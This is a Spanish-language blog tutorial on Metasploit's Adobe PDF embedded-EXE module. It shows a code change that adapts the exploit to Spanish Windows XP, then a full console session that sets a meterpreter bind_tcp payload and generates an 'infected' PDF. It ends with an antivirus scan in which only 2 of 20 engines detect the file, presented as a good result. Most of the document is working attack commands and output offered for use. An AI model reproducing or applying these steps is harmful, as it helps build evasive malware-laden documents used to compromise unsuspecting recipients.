Incrustar ejecutable dentro de un archivo de Adobe PDF[Metasploit By:
Shell Root]
Retomando un poco lo que es la herramienta '
Metasploit', encontré un exploit donde podemos realizar una incrustación de un archivo ejecutable dentro de un archivo de Adobe PDF.
Descripción del ExploitUbicación: | /windows/fileformat/adobe_pdf_embedded_exe |
Nombre: | Adobe PDF Embedded EXE Social Engineering |
Versión: | 0 |
Plataforma: | Windows |
Licencia: | Metasploit Framework License (BSD) |
Rango: | Excelente |
Proporciando por: | Colin Ames <amesc@attackresearch.com> |
Objetivos disponibles: | Adobe Reader v8.x, v9.x (Windows XP SP3 English) |
Descripción: | Este módulo del Metasploit incorpora una carga de un archivo PDF existente. |
Como podemos ver, el exploit, solo funciona con sistema operativo windows xp en ingles
(Windows XP ... English), pero aquí lo haremos portable a un windows en español, ya que es él que nos interesa.
Después de esta breve definición del exploit, vamos a ver como funciona este exploit, primero que todo, para que nos funcione dentro de un sistema operativo windows xp en español, vamos a la linea
232 del exploit, donde reemplazamos este código:
232. dirs = [ "Desktop", "My Documents", "Documents" ]
por este:
232. dirs = [ "Desktop", "My Documents", "Documents", "Escritorio", "Mis Documentos"]
Como vemos de añadimos algunos parámetros necesarios para que nuestro exploit corra en un windows en ingles como también en un windows en español. Después de realizar esto, vamos a generar nuestro
PoC!
Abrimos la consola del
Metasploit, seleccionamos el exploit, y le ingresamos los parámetros necesarios y lo lanzamos. Inmediatamente se creara el PoC con el archivo pdf "infectado".
root@bt:/opt/metasploit3/msf3# msfconsole
o 8 o o
8 8 8
ooYoYo. .oPYo. o8P .oPYo. .oPYo. .oPYo. 8 .oPYo. o8 o8P
8' 8 8 8oooo8 8 .oooo8 Yb.. 8 8 8 8 8 8 8
8 8 8 8. 8 8 8 'Yb. 8 8 8 8 8 8 8
8 8 8 `Yooo' 8 `YooP8 `YooP' 8YooP' 8 `YooP' 8 8
..:..:..:.....:::..::.....::.....:8.....:..:.....::..::..:
::::::::::::::::::::::::::::::::::8:::::::::::::::::::::::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
=[ metasploit v3.4.0-dev [core:3.4 api:1.0]
+ -- --=[ 540 exploits - 256 auxiliary
+ -- --=[ 207 payloads - 23 encoders - 8 nops
=[ svn r9040 updated today (2010.04.07)
msf > use windows/fileformat/adobe_pdf_embedded_exe
msf exploit(adobe_pdf_embedded_exe) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
EXENAME no The Name of payload exe.
FILENAME evil.pdf no The output filename.
INFILENAME yes The Input PDF filename.
OUTPUTPATH ./data/exploits/ no The location to output the file.
Exploit target:
Id Name
-- ----
0 Adobe Reader v8.x, v9.x (Windows XP SP3 English)
msf exploit(adobe_pdf_embedded_exe) > set OUTPUTPATH /root/
OUTPUTPATH => /root/
msf exploit(adobe_pdf_embedded_exe) > set FILENAME PoC_PDF_EXE.pdf
FILENAME => PoC_PDF_EXE.pdf
msf exploit(adobe_pdf_embedded_exe) > set EXENAME /root/cmd.exe
EXENAME => /root/cmd.exe
msf exploit(adobe_pdf_embedded_exe) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf exploit(adobe_pdf_embedded_exe) > set INFILENAME /root/PoC_PDF_EXE_File.pdf
INFILENAME => /root/PoC_PDF_EXE_File.pdf
msf exploit(adobe_pdf_embedded_exe) > exploit
[*] Started bind handler
[*] Reading in '/root/PoC_PDF_EXE_File.pdf'...
[*] Parsing '/root/PoC_PDF_EXE_File.pdf'...
[*] Parsing Successful.
[*] Using '/root/cmd.exe' as payload...
[*] Creating 'PoC_PDF_EXE.pdf' file...
[*] Generated output file /root/PoC_PDF_EXE.pdf
[*] Exploit completed, but no session was created.
msf exploit(adobe_pdf_embedded_exe) >
PD: El exploit trabaja con un payload de por medio, como vieron solo seleccione el payload bind_tcp, ya que no surge ningun efecto a la hora de ejecutar el PoC. Esto si seria necesario a la hora de ejecutar un payload convertido en ejecutable.
Nos genero el archivo PDF correctamente, ahora miremos nuestro PoC en acción.
Miremos que nos dice el Scanner de
NoVirusThanks:
File InfoReport date: 2010-04-08 07:14:17 (GMT 1)
File name:
PoC_PDF_EXE.pdfFile size: 1698671 bytes
MD5 Hash: 23d92e4f9b132150d002d014eb772529
SHA1 Hash: 20f0caceffefa8958ffa7638657393ae2d34e3c1
Detection rate:
2 on 20 (
10%)
Status:
INFECTED Detectionsa-squared - -
Avast -
JS:Pdfka-XN [Expl]AVG - -
Avira AntiVir - -
BitDefender -
Exploit.PDF-Dropper.GenClamAV - -
Comodo - -
Dr.Web - -
Ewido - -
F-PROT6 - -
G-Data - -
Ikarus T3 - -
Kaspersky - -
McAfee - -
NOD32 - -
Panda - -
Solo - -
TrendMicro - -
VBA32 - -
Zoner - -
Scan report generated by NoVirusThanks.org Fuente: http://shellrootsecurity.blogspot.com/2010/04/metasploit-incrustar-ejecutable-dentro.html